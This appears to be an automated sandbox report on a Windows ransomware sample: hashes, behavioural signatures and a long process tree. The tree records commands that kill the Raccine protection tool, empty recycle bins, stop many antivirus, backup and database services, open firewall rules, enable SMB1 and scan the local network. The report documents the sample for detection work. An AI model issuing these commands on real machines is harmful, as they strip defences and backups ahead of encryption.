Analysis
-
max time kernel
88s -
max time network
115s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
23-03-2021 18:12
General
-
Target
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
-
Size
368KB
-
MD5
2a6f56addd8adcbb1a6cc8e1d6090012
-
SHA1
03227744a280d56267cbef448f7e54a924f46173
-
SHA256
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554
-
SHA512
63d951d531ac8c9be311a73ab3c70f3b0afe77a71bbc949ede5564bc98de523bc324c926cb9d4a49dd25171f62333e645e4a56d9e2b4cceab3976672a4eba2c0
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Windows security modification 2 TTPs 1 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 57 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 61 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵
-
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y4⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y4⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y4⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop macmnsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKey /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop tmlisten /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TmCCSF /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update_64 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_filter /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophossps /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SntpService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SmcService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Smcinst /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ShMonitor /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SepMasterService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVAdminService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sacsvr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfevtp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RESvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y4⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfemms /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfefire /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McTaskManager /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL80 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McShield /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL57 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBEndpointAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBAMService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop masvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop kavfsslp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y4⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c net view2⤵
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop IISAdmin /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
